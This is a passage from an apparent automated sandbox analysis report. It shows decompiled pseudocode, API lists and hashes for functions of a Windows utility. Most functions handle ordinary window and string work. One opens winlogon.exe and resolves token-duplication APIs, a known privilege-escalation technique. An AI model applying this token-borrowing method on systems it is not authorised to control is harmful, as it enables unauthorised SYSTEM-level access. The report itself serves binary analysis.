0x0040317c
0x0040317f
0x0040317f
0x00403182
0x0040318a
0x00000000
0x0040318c
0x0040318c
0x00000000
0x0040318c

APIs

LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
#17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD

Strings

InitCommonControlsEx, xrefs: 00403168
Error: Cannot load the common control classes., xrefs: 004031A7
comctl32.dll, xrefs: 00403145
Error, xrefs: 004031A2

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C

Uniqueness

Uniqueness Score: -1.00%

Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}

0x00404da9
0x00404dbc
0x00404dbf
0x00404dc6
0x00404dcc
0x00404dce
0x00404de1
0x00404deb
0x00404df2
0x00404df4
0x00404df4
0x00404e07
0x00404e0d
0x00404e18
0x00404e1c
0x00404e1e
0x00404e27
0x00404e28
0x00404e29
0x00404e2f
0x00404e31
0x00404e37
0x00404e41
0x00404e42
0x00404e43
0x00404e46
0x00404e46
0x00404e1c
0x00404e4d
0x00404e50
0x00404e5f
0x00404e66
0x00404e52
0x00404e52
0x00404e52
0x00404e6d
0x00404e70
0x00404e85
0x00404e85
0x00000000
0x00404e72
0x00404e7b
0x00404e80
0x00404e83
0x00404e87
0x00404e89
0x00404e8b
0x00404e8b
0x00404ea8
0x00404ea8
0x00000000
0x00404e83

APIs

GetSystemMetrics.USER32 ref: 00404DC2
GetSystemMetrics.USER32 ref: 00404DC8
GetDC.USER32(00000000), ref: 00404DD5
GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
ReleaseDC.USER32 ref: 00404DF4
GetWindowRect.USER32 ref: 00404E07
GetParent.USER32(?), ref: 00404E12
GetWindowRect.USER32 ref: 00404E2F
MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
String ID:
API String ID: 2163313125-0
Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}

0x0040639c
0x004063a4
0x004063b2
0x004063c2
0x004063d3
0x004063dc
0x004063eb
0x004063f0
0x00406401
0x00000000
0x0040641e
0x0040641f

APIs

Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE

wcscpy.MSVCRT ref: 004063B2
wcscpy.MSVCRT ref: 004063C2
GetPrivateProfileIntW.KERNEL32 ref: 004063D3

Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30

Strings

TranslatorURL, xrefs: 0040640B
general, xrefs: 004063B7
charset, xrefs: 004063E1
rtl, xrefs: 004063CD
TranslatorName, xrefs: 004063F7

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfilewcscpy$AttributesFileString
String ID: TranslatorName$TranslatorURL$charset$general$rtl
API String ID: 3176057301-2039793938
Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}

0x0040adf6
0x0040adf8
0x0040adfa
0x0040adfb
0x0040adfb
0x0040ae02
0x00000000
0x00000000
0x0040ae04
0x0040ae05
0x0040ae6d
0x0040ae6e
0x0040ae73
0x0040ae76
0x0040ae7f
0x0040ae83
0x0040ae86
0x00000000
0x0040ae86
0x0040ae8f
0x0040ae0c
0x0040ae10
0x0040ae1e
0x0040ae3b
0x0040ae4a
0x0040ae65
0x0040ae7a
0x0040ae7e
0x0040ae67
0x0040ae67
0x0040ae68
0x00000000
0x0040ae68
0x0040ae4c
0x0040ae4c
0x0040ae4e
0x00000000
0x0040ae4e
0x0040ae3d
0x0040ae3d
0x0040ae3f
0x0040ae53
0x0040ae54
0x0040ae59
0x0040ae5c
0x0040ae5c
0x0040ae20
0x0040ae28
0x0040ae2d
0x0040ae30
0x0040ae30
0x0040ae12
0x0040ae12
0x0040ae13
0x00000000
0x0040ae13
0x00000000
0x0040ae10

APIs

memcpy.MSVCRT ref: 0040AE28
memcpy.MSVCRT ref: 0040AE54
memcpy.MSVCRT ref: 0040AE6E

Strings

<br>, xrefs: 0040AE68
&, xrefs: 0040AE4E
°, xrefs: 0040AE3F
>, xrefs: 0040AE13
<, xrefs: 0040AE05
", xrefs: 0040AE22

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF

Uniqueness

Uniqueness Score: -1.00%

Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}

0x004041f9
0x00404205
0x00404208
0x00404217
0x0040421e
0x00404236
0x0040423f
0x0040424a
0x0040425f
0x0040426b
0x0040426e
0x0040426e
0x00404275
0x004043be
0x004043ce
0x004043d0
0x004043d3
0x004043da
0x004043da
0x004043c0
0x004043c3
0x004043c3
0x0040427b
0x0040428c
0x0040428f
0x00404295
0x004042a5
0x004042b8
0x004042cb
0x004042de
0x004042f1
0x00404304
0x00404317
0x0040432a
0x0040433d
0x00404350
0x00404363
0x00404376
0x00404389
0x0040439c
0x004043a4
0x004043af
0x004043b5
0x004043b5
0x004043f5

APIs

memset.MSVCRT ref: 0040421E
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
DragFinish.SHELL32(?), ref: 0040423F

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4

BeginDeferWindowPos.USER32 ref: 0040427D
EndDeferWindowPos.USER32(?), ref: 004043A4
InvalidateRect.USER32(?,?,00000001), ref: 004043AF

Strings

$, xrefs: 004043CA

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
String ID: $
API String ID: 2142561256-3993045852
Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4

Uniqueness

Uniqueness Score: -1.00%

Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}

0x00405b81
0x00405b88
0x00405b8a
0x00405b8a
0x00405b8f
0x00405b96
0x00405b9b
0x00405bad
0x00405bad
0x00405b9d
0x00405b9d
0x00405ba8
0x00405bab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405bab
0x00405be9
0x00405be9
0x00405baf
0x00405bb1
0x00405ce2
0x00405ce2
0x00405bb7
0x00405bbd
0x00405bf6
0x00405c4b
0x00405c4c
0x00405c52
0x00405c53
0x00000000
0x00405bf8
0x00405c02
0x00405c0e
0x00405c13
0x00405c18
0x00405c2c
0x00405c2e
0x00405c3b
0x00405c3c
0x00405c42
0x00000000
0x00405c1a
0x00405c25
0x00405c2a
0x00000000
0x00000000
0x00405c2a
0x00405c18
0x00405bbf
0x00405bc0
0x00405bcd
0x00405bce
0x00405bd7
0x00405c58
0x00405c5f
0x00405c61
0x00405c61
0x00405c63
0x00405cdb
0x00405cdb
0x00405c65
0x00405c65
0x00405c74
0x00000000
0x00405c84
0x00405c8a
0x00405c8d
0x00405c99
0x00405caf
0x00405cbd
0x00405cc8
0x00405cd4
0x00405cd9
0x00000000
0x00000000
0x00000000
0x00000000
0x00405cd9
0x00405c74
0x00405c63
0x00405ce6

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
wcscpy.MSVCRT ref: 00405C02

Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE

wcslen.MSVCRT ref: 00405C20
GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73

Strings

strings, xrefs: 00405BF8

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
String ID: strings
API String ID: 3166385802-3030018805
Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C

Uniqueness

Uniqueness Score: -1.00%

Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}

0x00401e59
0x00401e5c
0x00401e64
0x00401e67
0x00401ef9
0x00401e6d
0x00401e70
0x00401e76
0x00401e79
0x00401e7e
0x00401e83
0x00401e92
0x00401e85
0x00401e8e
0x00401e8e
0x00401e96
0x00401ee6
0x00401e98
0x00401e9b
0x00401e9e
0x00401ea3
0x00401ea8
0x00401ebb
0x00401eaa
0x00401eb7
0x00401eb7
0x00401ebf
0x00401ed3
0x00401ec1
0x00401ec7
0x00401ec9
0x00401ec9
0x00401ed8
0x00401ed8
0x00401eeb
0x00401eeb
0x00401f01

APIs

OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3

Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB

Strings

winlogon.exe, xrefs: 00401E4B

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
String ID: winlogon.exe
API String ID: 1315556178-961692650
Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94

Uniqueness

Uniqueness Score: -1.00%

Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}

0x00405241
0x00405250
0x00405257
0x0040525f
0x00405262
0x00405265
0x00405268
0x0040526f
0x0040526f
0x00405277
0x00405277
0x0040527a
0x0040527f
0x00405284
0x00405285
0x00405291
0x00405296
0x004052a9
0x004052b3
0x004052b7
0x004052bc
0x004052ca
0x004052d2
0x004052d5
0x004052d8
0x004052d8
0x004052db
0x004052db
0x004052e1
0x004052e4
0x004052e8
0x004052f2

APIs

memset.MSVCRT ref: 00405257
_snwprintf.MSVCRT ref: 00405285
wcslen.MSVCRT ref: 00405291
memcpy.MSVCRT ref: 004052A9
wcslen.MSVCRT ref: 004052B7
memcpy.MSVCRT ref: 004052CA

Strings

%s (%s), xrefs: 0040527A

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

